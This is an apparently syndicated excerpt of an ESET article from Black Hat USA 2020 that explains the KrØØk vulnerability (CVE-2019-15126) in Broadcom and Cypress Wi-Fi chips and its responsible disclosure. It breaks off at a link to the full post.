At Black Hat USA 2020, ESET researchers delved into details about the KrØØk vulnerability in Wi-Fi chips and revealed that similar bugs affect more chip brands than previously thought
From KrØØk to finding related vulnerabilities
KrØØk (formally CVE-2019-15126) is a vulnerability in Broadcom and Cypress Wi-Fi chips that allows unauthorized decryption of some WPA2-encrypted traffic. Specifically, the bug has led to wireless network data being encrypted with a WPA2 pairwise session key that is all zeros instead of the proper session key that had previously been established in the 4-way handshake. This undesirable state occurs on vulnerable Broadcom and Cypress chips following a Wi-Fi disassociation.
Figure 1. Overview of KrØØk – following a disassociation, data is transmitted encrypted with an all zero session key
Exploiting KrØØk allows adversaries to intercept and decrypt (potentially sensitive) data of interest and, when compared to other techniques commonly used against Wi-Fi, exploiting KrØØk has a significant advantage: while they need to be in range of the Wi-Fi signal, the attackers do not need to be authenticated and associated to the WLAN. In other words, they don’t need to know the Wi-Fi password.
We worked with the affected vendors (as well as ICASI) through a responsible disclosure process before we first publicly disclosed the flaw at the RSA Conference in February 2020. The ensuing publicity brought the issue to the attention of many more chipset and device manufactu ..
Support the originator by clicking the read the rest link below.
